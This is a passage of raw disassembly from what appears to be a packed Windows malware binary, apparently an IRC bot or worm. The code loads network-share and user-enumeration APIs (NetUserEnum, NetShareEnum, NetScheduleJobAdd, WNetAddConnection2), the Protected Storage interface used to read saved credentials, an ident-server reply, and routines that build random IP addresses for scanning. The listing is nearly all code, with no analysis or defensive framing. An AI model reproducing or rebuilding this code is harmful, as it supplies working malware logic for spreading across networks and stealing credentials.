; ---------------------------------------------------------------------------
loc_403716: ; CODE XREF: sub_403588+17B�j
; sub_403588+18A�j
cmp [ebp+var_20], 0
jnz short loc_403726
mov eax, 2AFBh
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_403726: ; CODE XREF: sub_403588+192�j
mov eax, [ebp+var_20]
imul eax, 30h
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jnz short loc_40374C
push 8
call dword_417234 ; WSASetLastError
push 8
pop eax
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_40374C: ; CODE XREF: sub_403588+1B2�j
mov eax, [ebp+var_20]
imul eax, 30h
push eax
push 0
push [ebp+var_1C]
call sub_416B6A ; memset
add esp, 0Ch
push 10h
push 0
lea eax, [ebp+var_10]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_10], 2
cmp [ebp+arg_4], 0
jz short loc_403790
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
push eax
call dword_417238 ; ntohs
mov [ebp+var_E], ax
loc_403790: ; CODE XREF: sub_403588+1F2�j
and [ebp+var_18], 0
jmp short loc_40379D
; ---------------------------------------------------------------------------
loc_403796: ; CODE XREF: sub_403588:loc_4038A7�j
mov eax, [ebp+var_18]
inc eax
mov [ebp+var_18], eax
loc_40379D: ; CODE XREF: sub_403588+20C�j
mov eax, [ebp+var_18]
cmp eax, [ebp+var_20]
jnb loc_4038AC
cmp [ebp+arg_8], 0
jz short loc_4037B9
mov eax, [ebp+arg_8]
mov eax, [eax]
mov [ebp+var_40], eax
jmp short loc_4037C0
; ---------------------------------------------------------------------------
loc_4037B9: ; CODE XREF: sub_403588+225�j
mov [ebp+var_40], 4
loc_4037C0: ; CODE XREF: sub_403588+22F�j
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
mov edx, [ebp+var_40]
mov [ecx+eax], edx
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
mov dword ptr [ecx+eax+4], 2
cmp [ebp+arg_8], 0
jz short loc_4037F1
mov eax, [ebp+arg_8]
mov eax, [eax+8]
mov [ebp+var_44], eax
jmp short loc_4037F8
; ---------------------------------------------------------------------------
loc_4037F1: ; CODE XREF: sub_403588+25C�j
mov [ebp+var_44], 1
loc_4037F8: ; CODE XREF: sub_403588+267�j
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
mov edx, [ebp+var_44]
mov [ecx+eax+8], edx
cmp [ebp+arg_8], 0
jz short loc_403819
mov eax, [ebp+arg_8]
mov eax, [eax+0Ch]
mov [ebp+var_48], eax
jmp short loc_403820
; ---------------------------------------------------------------------------
loc_403819: ; CODE XREF: sub_403588+284�j
mov [ebp+var_48], 6
loc_403820: ; CODE XREF: sub_403588+28F�j
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
mov edx, [ebp+var_48]
mov [ecx+eax+0Ch], edx
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
mov dword ptr [ecx+eax+10h], 10h
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
lea eax, [ecx+eax+20h]
loc_40384E: ; DATA XREF: sub_4300B6�r
; .RLPack:0043021B�r ...
mov ecx, [ebp+var_18]
imul ecx, 30h
mov edx, [ebp+var_1C]
mov [edx+ecx+18h], eax
mov eax, [ebp+var_14]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_18]
mov eax, [eax+ecx*4]
mov eax, [eax]
mov [ebp+var_C], eax
push 10h
lea eax, [ebp+var_10]
push eax
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
lea eax, [ecx+eax+20h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
cmp [ebp+var_18], 0
jz short loc_4038A7
mov eax, [ebp+var_18]
imul eax, 30h
mov ecx, [ebp+var_1C]
add ecx, eax
mov eax, [ebp+var_18]
dec eax
imul eax, 30h
mov edx, [ebp+var_1C]
mov [edx+eax+1Ch], ecx
loc_4038A7: ; CODE XREF: sub_403588+304�j
jmp loc_403796
; ---------------------------------------------------------------------------
loc_4038AC: ; CODE XREF: sub_403588+21B�j
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_1C]
mov [eax], ecx
xor eax, eax
locret_4038B6: ; CODE XREF: sub_403588+2E�j
; sub_403588+55�j ...
leave
retn 10h
sub_403588 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4038BA proc near ; DATA XREF: sub_403BD3+1BC�o
var_434 = dword ptr -434h
var_430 = byte ptr -430h
var_410 = dword ptr -410h
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = byte ptr -404h
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 434h
cmp [ebp+arg_8], 0
jnz short loc_4038CF
cmp [ebp+arg_10], 0
jz short loc_4038D8
loc_4038CF: ; CODE XREF: sub_4038BA+D�j
mov eax, [ebp+arg_18]
and al, 0E0h
test eax, eax
jz short loc_4038ED
loc_4038D8: ; CODE XREF: sub_4038BA+13�j
push 2726h
call dword_417234 ; WSASetLastError
mov eax, 2726h
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_4038ED: ; CODE XREF: sub_4038BA+1C�j
mov eax, [ebp+arg_0]
mov [ebp+var_40C], eax
mov eax, [ebp+var_40C]
movsx eax, word ptr [eax]
cmp eax, 2
jz short loc_403919
push 273Fh
call dword_417234 ; WSASetLastError
mov eax, 273Fh
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403919: ; CODE XREF: sub_4038BA+48�j
cmp [ebp+arg_8], 0
jz loc_403ABA
mov eax, [ebp+var_40C]
push dword ptr [eax+4]
call dword_41721C ; inet_ntoa
mov [ebp+var_434], eax
cmp [ebp+var_434], 0
jnz short loc_403949
or eax, 0FFFFFFFFh
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403949: ; CODE XREF: sub_4038BA+85�j
push 401h
push [ebp+var_434]
lea eax, [ebp+var_404]
loc_40395A: ; DATA XREF: sub_4300B6+51�r
; sub_4305F2+25�r
push eax
call sub_407A56
add esp, 0Ch
mov eax, [ebp+arg_18]
and eax, 2
test eax, eax
jz short loc_403972
jmp loc_403BB4
; ---------------------------------------------------------------------------
loc_403972: ; CODE XREF: sub_4038BA+B1�j
; DATA XREF: .RLPack:0042FF14�r ...
mov eax, [ebp+arg_18]
and eax, 4
test eax, eax
loc_40397A: ; DATA XREF: sub_430188+22�w
; sub_4302AC+2D1�r
jz short loc_4039F4
push 0
loc_40397E: ; DATA XREF: sub_42E43F+CA�w
; sub_42E43F+DA�w ...
push 4
mov eax, [ebp+var_40C]
loc_403986: ; DATA XREF: .RLPack:0042FA1D�w
; .RLPack:0042FE62�r ...
add eax, 4
push eax
loc_40398A: ; DATA XREF: .RLPack:0042FB3F�w
; .RLPack:0042FC3A�w ...
call dword_417220 ; gethostbyaddr
mov [ebp+var_410], eax
loc_403996: ; DATA XREF: .RLPack:loc_42F8F5�r
cmp [ebp+var_410], 0
jnz short loc_4039AA
call dword_417224 ; WSAGetLastError
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_4039AA: ; CODE XREF: sub_4038BA+E3�j
; DATA XREF: sub_42F5BA+8�w ...
mov eax, [ebp+var_410]
push dword ptr [eax]
loc_4039B2: ; DATA XREF: sub_42E43F+4B�r
call sub_416B40 ; strlen
pop ecx
inc eax
cmp eax, [ebp+arg_C]
jbe short loc_4039D3
loc_4039BE: ; DATA XREF: sub_430039-8E�r
push 2747h
call dword_417234 ; WSASetLastError
mov eax, 2747h
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_4039D3: ; CODE XREF: sub_4038BA+102�j
push 401h
mov eax, [ebp+var_410]
push dword ptr [eax]
lea eax, [ebp+var_404]
push eax
call sub_407A56
add esp, 0Ch
jmp loc_403ABA
; ---------------------------------------------------------------------------
loc_4039F4: ; CODE XREF: sub_4038BA:loc_40397A�j
mov eax, [ebp+arg_18]
and eax, 1
test eax, eax
jz loc_403A92
mov eax, [ebp+var_40C]
cmp dword ptr [eax+4], 7F000001h
jz short loc_403A1D
mov eax, [ebp+var_40C]
cmp dword ptr [eax+4], 0
jnz short loc_403A92
loc_403A1D: ; CODE XREF: sub_4038BA+155�j
push 0
push 4
mov eax, [ebp+var_40C]
add eax, 4
push eax
call dword_417220 ; gethostbyaddr
mov [ebp+var_410], eax
cmp [ebp+var_410], 0
jnz short loc_403A4B
call dword_417224 ; WSAGetLastError
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403A4B: ; CODE XREF: sub_4038BA+184�j
mov eax, [ebp+var_410]
push dword ptr [eax]
call sub_416B40 ; strlen
pop ecx
inc eax
cmp eax, [ebp+arg_C]
jbe short loc_403A74
push 2747h
call dword_417234 ; WSASetLastError
mov eax, 2747h
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403A74: ; CODE XREF: sub_4038BA+1A3�j
push 401h
mov eax, [ebp+var_410]
push dword ptr [eax]
lea eax, [ebp+var_404]
push eax
call sub_407A56
add esp, 0Ch
jmp short loc_403ABA
; ---------------------------------------------------------------------------
loc_403A92: ; CODE XREF: sub_4038BA+142�j
; sub_4038BA+161�j ...
lea eax, [ebp+var_404]
push eax
call sub_416B40 ; strlen
pop ecx
inc eax
cmp eax, [ebp+arg_C]
jbe short loc_403ABA
push 2747h
call dword_417234 ; WSASetLastError
mov eax, 2747h
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403ABA: ; CODE XREF: sub_4038BA+63�j
; sub_4038BA+135�j ...
cmp [ebp+arg_10], 0
jz loc_403B99
push 8
pop eax
test eax, eax
jz short loc_403B2C
push 0Ah
lea eax, [ebp+var_430]
push eax
mov eax, [ebp+var_40C]
mov ax, [eax+2]
push eax
call dword_417238 ; ntohs
movzx eax, ax
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
lea eax, [ebp+var_430]
push eax
call sub_416B40 ; strlen
pop ecx
inc eax
cmp eax, [ebp+arg_14]
jbe short loc_403B19
push 2747h
call dword_417234 ; WSASetLastError
mov eax, 2747h
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403B19: ; CODE XREF: sub_4038BA+248�j
lea eax, [ebp+var_430]
push eax
push [ebp+arg_10]
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_403B99
; ---------------------------------------------------------------------------
loc_403B2C: ; CODE XREF: sub_4038BA+20F�j
mov eax, [ebp+arg_18]
and eax, 10h
neg eax
sbb eax, eax
and eax, offset aUdp ; "udp"
push eax
mov eax, [ebp+var_40C]
movzx eax, word ptr [eax+2]
push eax
call dword_417228 ; getservbyport
mov [ebp+var_408], eax
cmp [ebp+var_408], 0
jnz short loc_403B61
or eax, 0FFFFFFFFh
jmp short locret_403BB9
; ---------------------------------------------------------------------------
loc_403B61: ; CODE XREF: sub_4038BA+2A0�j
mov eax, [ebp+var_408]
push dword ptr [eax]
call sub_416B40 ; strlen
pop ecx
inc eax
cmp eax, [ebp+arg_14]
jbe short loc_403B87
push 2747h
call dword_417234 ; WSASetLastError
mov eax, 2747h
jmp short locret_403BB9
; ---------------------------------------------------------------------------
loc_403B87: ; CODE XREF: sub_4038BA+2B9�j
mov eax, [ebp+var_408]
push dword ptr [eax]
push [ebp+arg_10]
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_403B99: ; CODE XREF: sub_4038BA+204�j
; sub_4038BA+270�j
cmp [ebp+arg_8], 0
jz short loc_403BB0
lea eax, [ebp+var_404]
push eax
push [ebp+arg_8]
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_403BB0: ; CODE XREF: sub_4038BA+2E3�j
xor eax, eax
jmp short locret_403BB9
; ---------------------------------------------------------------------------
loc_403BB4: ; CODE XREF: sub_4038BA+B3�j
jmp loc_403A92
; ---------------------------------------------------------------------------
locret_403BB9: ; CODE XREF: sub_4038BA+2E�j
; sub_4038BA+5A�j ...
leave
retn 1Ch
sub_4038BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403BBD proc near ; DATA XREF: sub_403BD3+1C6�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp [ebp+arg_0], 0
jz short loc_403BCF
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
loc_403BCF: ; CODE XREF: sub_403BBD+7�j
pop ebp
retn 4
sub_403BBD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403BD3 proc near ; CODE XREF: .packed:loc_4168BC�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
push offset aKernel32_dll ; "kernel32.dll"
call dword_417054 ; LoadLibraryA
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_403C00
push offset aInitializecrit ; "InitializeCriticalSectionAndSpinCount"
push [ebp+var_C]
call dword_417058 ; GetProcAddress
mov dword_41DED0, eax
loc_403C00: ; CODE XREF: sub_403BD3+18�j
push offset aNetapi32_dll ; "netapi32.dll"
call dword_417054 ; LoadLibraryA
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jz loc_403CC3
push offset aNetusegetinfo ; "NetUseGetInfo"
push [ebp+var_14]
call dword_417058 ; GetProcAddress
mov dword_41DED8, eax
push offset aNetuseadd ; "NetUseAdd"
push [ebp+var_14]
call dword_417058 ; GetProcAddress
mov dword_41DEDC, eax
push offset aNetusedel ; "NetUseDel"
push [ebp+var_14]
call dword_417058 ; GetProcAddress
mov dword_41DEE0, eax
push offset aNetuserenum ; "NetUserEnum"
push [ebp+var_14]
call dword_417058 ; GetProcAddress
mov dword_41DEE4, eax
push offset aNetshareenum ; "NetShareEnum"
push [ebp+var_14]
call dword_417058 ; GetProcAddress
mov dword_41DEE8, eax
push offset aNetremotetod ; "NetRemoteTOD"
push [ebp+var_14]
call dword_417058 ; GetProcAddress
mov dword_41DEEC, eax
push offset aNetapibufferfr ; "NetApiBufferFree"
push [ebp+var_14]
call dword_417058 ; GetProcAddress
mov dword_41DEF0, eax
push offset aNetschedulejob ; "NetScheduleJobAdd"
push [ebp+var_14]
call dword_417058 ; GetProcAddress
mov dword_41DEF4, eax
push offset aNetaddalternat ; "NetAddAlternateComputerName"
push [ebp+var_14]
call dword_417058 ; GetProcAddress
mov dword_41DEF8, eax
loc_403CC3: ; CODE XREF: sub_403BD3+3F�j
push offset aMpr_dll ; "mpr.dll"
call dword_417054 ; LoadLibraryA
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_403D23
push offset aWnetaddconnect ; "WNetAddConnection2A"
push [ebp+var_8]
call dword_417058 ; GetProcAddress
mov dword_41DEFC, eax
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push [ebp+var_8]
call dword_417058 ; GetProcAddress
mov dword_41DF00, eax
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push [ebp+var_8]
call dword_417058 ; GetProcAddress
mov dword_41DF04, eax
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push [ebp+var_8]
call dword_417058 ; GetProcAddress
mov dword_41DF08, eax
loc_403D23: ; CODE XREF: sub_403BD3+102�j
push offset aWs2_32_dll ; "ws2_32.dll"
call dword_417054 ; LoadLibraryA
mov [ebp+var_4], eax
push offset aGetaddrinfo ; "getaddrinfo"
push [ebp+var_4]
call dword_417058 ; GetProcAddress
mov dword_41DF14, eax
push offset aGetnameinfo ; "getnameinfo"
push [ebp+var_4]
call dword_417058 ; GetProcAddress
mov dword_41DF18, eax
push offset aFreeaddrinfo ; "freeaddrinfo"
push [ebp+var_4]
call dword_417058 ; GetProcAddress
mov dword_41DF1C, eax
cmp dword_41DF14, 0
jz short loc_403D85
cmp dword_41DF18, 0
jz short loc_403D85
cmp dword_41DF1C, 0
jnz short loc_403DA3
loc_403D85: ; CODE XREF: sub_403BD3+19E�j
; sub_403BD3+1A7�j
mov dword_41DF14, offset sub_403588
mov dword_41DF18, offset sub_4038BA
mov dword_41DF1C, offset sub_403BBD
loc_403DA3: ; CODE XREF: sub_403BD3+1B0�j
push offset aPstorec_dll ; "pstorec.dll"
call dword_417054 ; LoadLibraryA
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_403DCA
push offset aPstorecreatein ; "PStoreCreateInstance"
push [ebp+var_10]
call dword_417058 ; GetProcAddress
mov dword_41DF10, eax
loc_403DCA: ; CODE XREF: sub_403BD3+1E2�j
push offset aWininet_dll ; "wininet.dll"
call dword_417054 ; LoadLibraryA
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jz short locret_403DF1
push offset aInternetgetcon ; "InternetGetConnectedStateExA"
push [ebp+var_18]
call dword_417058 ; GetProcAddress
mov dword_41DF0C, eax
locret_403DF1: ; CODE XREF: sub_403BD3+209�j
leave
retn
sub_403BD3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403DF3 proc near ; DATA XREF: sub_403FE5+89�o
var_1228 = dword ptr -1228h
var_1224 = byte ptr -1224h
var_1200 = byte ptr -1200h
var_11DC = byte ptr -11DCh
var_11B8 = dword ptr -11B8h
var_11B4 = dword ptr -11B4h
var_11B0 = dword ptr -11B0h
var_11AC = byte ptr -11ACh
var_11A6 = byte ptr -11A6h
var_1000 = byte ptr -1000h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1228h
call sub_416BC0
push 1ADh
push [ebp+arg_0]
lea eax, [ebp+var_11B0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 1
lea eax, [ebp+var_11AC]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_11B4], eax
cmp [ebp+var_11B4], 0
jnz short loc_403E52
push [ebp+var_11B0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_403FE1
; ---------------------------------------------------------------------------
loc_403E52: ; CODE XREF: sub_403DF3+4A�j
lea eax, [ebp+var_11AC]
push eax
mov eax, [ebp+var_11B0]
push dword ptr [eax]
push offset dword_4189C4
lea eax, [ebp+var_11A6]
push eax
call sub_40D53F
add esp, 10h
loc_403E75: ; CODE XREF: sub_403DF3+BD�j
; sub_403DF3+10F�j ...
push 3E8h
push [ebp+var_11B4]
call sub_4048EF
pop ecx
pop ecx
mov [ebp+var_11B8], eax
mov eax, [ebp+var_11B0]
cmp dword ptr [eax+4], 0
jnz short loc_403EA2
cmp [ebp+var_11B8], 0
jnz short loc_403EA7
loc_403EA2: ; CODE XREF: sub_403DF3+A4�j
jmp loc_403FC7
; ---------------------------------------------------------------------------
loc_403EA7: ; CODE XREF: sub_403DF3+AD�j
cmp [ebp+var_11B8], 0FFFFFFFFh
jnz short loc_403EB2
jmp short loc_403E75
; ---------------------------------------------------------------------------
loc_403EB2: ; CODE XREF: sub_403DF3+BB�j
push 1000h
lea eax, [ebp+var_1000]
push eax
push [ebp+var_11B8]
call sub_4053DC
add esp, 0Ch
mov [ebp+var_1228], eax
cmp [ebp+var_1228], 0
jz short loc_403EF6
cmp [ebp+var_1228], 0FFFFFFFFh
jz short loc_403EF6
lea eax, [ebp+var_1000]
push eax
call sub_416B40 ; strlen
pop ecx
cmp eax, 10h
jbe short loc_403F07
loc_403EF6: ; CODE XREF: sub_403DF3+E6�j
; sub_403DF3+EF�j
push [ebp+var_11B8]
call sub_40538D
pop ecx
jmp loc_403E75
; ---------------------------------------------------------------------------
loc_403F07: ; CODE XREF: sub_403DF3+101�j
movsx eax, byte_41EF58
test eax, eax
jz short loc_403F27
push offset byte_41EF58
lea eax, [ebp+var_1224]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_403F57
; ---------------------------------------------------------------------------
loc_403F27: ; CODE XREF: sub_403DF3+11D�j
lea eax, [ebp+var_1200]
push eax
lea eax, [ebp+var_1224]
push eax
lea eax, [ebp+var_11DC]
push eax
call sub_40668F
add esp, 0Ch
lea eax, [ebp+var_1224]
push eax
push offset byte_41EF58
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_403F57: ; CODE XREF: sub_403DF3+132�j
push offset aUseridUnix ; " : USERID : UNIX : "
lea eax, [ebp+var_1000]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
lea eax, [ebp+var_1224]
push eax
lea eax, [ebp+var_1000]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
push offset asc_418214 ; "\r\n"
lea eax, [ebp+var_1000]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
lea eax, [ebp+var_1000]
push eax
call sub_416B40 ; strlen
pop ecx
inc eax
push eax
lea eax, [ebp+var_1000]
push eax
push [ebp+var_11B8]
call sub_4053BF
add esp, 0Ch
push [ebp+var_11B8]
call sub_40538D
pop ecx
jmp loc_403E75
; ---------------------------------------------------------------------------
loc_403FC7: ; CODE XREF: sub_403DF3:loc_403EA2�j
push [ebp+var_11B4]
call sub_404CBB
pop ecx
push [ebp+var_11B0]
call sub_409763
pop ecx
xor eax, eax
locret_403FE1: ; CODE XREF: sub_403DF3+5A�j
leave
retn 4
sub_403DF3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403FE5 proc near ; CODE XREF: sub_40A9CF+EEC�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_4], 0
jz short loc_403FFD
push [ebp+arg_4]
call sub_40422A
pop ecx
test eax, eax
jnz short loc_404004
loc_403FFD: ; CODE XREF: sub_403FE5+9�j
mov [ebp+arg_4], offset dword_418A18
loc_404004: ; CODE XREF: sub_403FE5+16�j
push 1ADh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40401A
jmp short locret_40407B
; ---------------------------------------------------------------------------
loc_40401A: ; CODE XREF: sub_403FE5+31�j
push 6
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 0Ah
push eax
call sub_405F67
pop ecx
pop ecx
cmp [ebp+arg_0], 0
jz short loc_404059
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
test eax, eax
jz short loc_404059
and [ebp+var_8], 0
jmp short loc_404060
; ---------------------------------------------------------------------------
loc_404059: ; CODE XREF: sub_403FE5+5E�j
; sub_403FE5+6C�j
mov [ebp+var_8], 1
loc_404060: ; CODE XREF: sub_403FE5+72�j
push [ebp+arg_4]
push offset dword_4189F8
push [ebp+var_8]
push [ebp+var_4]
push offset sub_403DF3
call sub_4095A4
add esp, 14h
locret_40407B: ; CODE XREF: sub_403FE5+33�j
leave
retn
sub_403FE5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40407D proc near ; CODE XREF: sub_4055E5+772�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
loc_404085: ; CODE XREF: sub_40407D+2C�j
cmp [ebp+arg_4], 1
jbe short loc_4040AB
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_4]
dec eax
dec eax
mov [ebp+arg_4], eax
jmp short loc_404085
; ---------------------------------------------------------------------------
loc_4040AB: ; CODE XREF: sub_40407D+C�j
cmp [ebp+arg_4], 0
jz short loc_4040BF
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
loc_4040BF: ; CODE XREF: sub_40407D+32�j
mov eax, [ebp+var_4]
shr eax, 10h
mov ecx, [ebp+var_4]
and ecx, 0FFFFh
add eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shr eax, 10h
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
not eax
leave
retn
sub_40407D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4040E8 proc near ; CODE XREF: sub_4055E5+752�p
; sub_40A9CF+1A2F�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
cmp [ebp+var_4], 2
jz short loc_404146
cmp [ebp+var_4], 3
jz short loc_404124
cmp [ebp+var_4], 4
jz short loc_404106
jmp short loc_40416A
; ---------------------------------------------------------------------------
loc_404106: ; CODE XREF: sub_4040E8+1A�j
mov eax, [ebp+arg_0]
and al, 0
mov [ebp+arg_0], eax
push 0FEh
push 1
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
or ecx, eax
mov [ebp+arg_0], ecx
loc_404124: ; CODE XREF: sub_4040E8+14�j
mov eax, [ebp+arg_0]
and ah, 0
mov [ebp+arg_0], eax
push 0FEh
push 1
call sub_4103F5
pop ecx
pop ecx
shl eax, 8
mov ecx, [ebp+arg_0]
or ecx, eax
mov [ebp+arg_0], ecx
loc_404146: ; CODE XREF: sub_4040E8+E�j
mov eax, [ebp+arg_0]
and eax, 0FF00FFFFh
mov [ebp+arg_0], eax
push 0FEh
push 1
call sub_4103F5
pop ecx
pop ecx
shl eax, 10h
mov ecx, [ebp+arg_0]
or ecx, eax
mov [ebp+arg_0], ecx
loc_40416A: ; CODE XREF: sub_4040E8+1C�j
mov eax, [ebp+arg_0]
and eax, 0FFFFFFh
mov [ebp+arg_0], eax
push 0FEh
push 1
call sub_4103F5
pop ecx
pop ecx
shl eax, 18h
mov ecx, [ebp+arg_0]
or ecx, eax
mov [ebp+arg_0], ecx
mov eax, [ebp+arg_0]
leave
retn
sub_4040E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404193 proc near ; CODE XREF: sub_404279+A�p
; sub_40435B+17�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0Ah
push [ebp+arg_0]
push 0FFFFh
push 401h
call sub_4103F5
pop ecx
pop ecx
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
pop ebp
retn
sub_404193 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4041B7 proc near ; CODE XREF: sub_40D871+5B3�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 4
push offset dword_418A48
push [ebp+arg_0]
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jnz short loc_4041D5
push 1
pop eax
jmp short loc_404228
; ---------------------------------------------------------------------------
loc_4041D5: ; CODE XREF: sub_4041B7+17�j
push 4
push offset dword_418A40
push [ebp+arg_0]
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jnz short loc_4041F0
push 1
pop eax
jmp short loc_404228
; ---------------------------------------------------------------------------
loc_4041F0: ; CODE XREF: sub_4041B7+32�j
push 8
push offset dword_418A34
push [ebp+arg_0]
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jnz short loc_40420B
push 1
pop eax
jmp short loc_404228
; ---------------------------------------------------------------------------
loc_40420B: ; CODE XREF: sub_4041B7+4D�j
push 3
push offset dword_418A30
push [ebp+arg_0]
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jnz short loc_404226
push 1
pop eax
jmp short loc_404228
; ---------------------------------------------------------------------------
loc_404226: ; CODE XREF: sub_4041B7+68�j
xor eax, eax
loc_404228: ; CODE XREF: sub_4041B7+1C�j
; sub_4041B7+37�j ...
pop ebp
retn
sub_4041B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40422A proc near ; CODE XREF: sub_402A32+206�p
; sub_403FE5+E�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
jmp short loc_40423C
; ---------------------------------------------------------------------------
loc_404235: ; CODE XREF: sub_40422A:loc_404273�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40423C: ; CODE XREF: sub_40422A+9�j
cmp [ebp+var_4], 6
jnz short loc_404244
jmp short loc_404275
; ---------------------------------------------------------------------------
loc_404244: ; CODE XREF: sub_40422A+16�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_404273
push [ebp+arg_0]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_40426C
cmp [ebp+var_8], 0FFFFh
jbe short loc_40426E
loc_40426C: ; CODE XREF: sub_40422A+37�j
jmp short loc_404275
; ---------------------------------------------------------------------------
loc_40426E: ; CODE XREF: sub_40422A+40�j
push 1
pop eax
jmp short locret_404277
; ---------------------------------------------------------------------------
loc_404273: ; CODE XREF: sub_40422A+25�j
jmp short loc_404235
; ---------------------------------------------------------------------------
loc_404275: ; CODE XREF: sub_40422A+18�j
; sub_40422A:loc_40426C�j
xor eax, eax
locret_404277: ; CODE XREF: sub_40422A+47�j
leave
retn
sub_40422A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404279 proc near ; CODE XREF: sub_4042FB+C�p
; sub_408B30+197�p ...
var_18 = dword ptr -18h
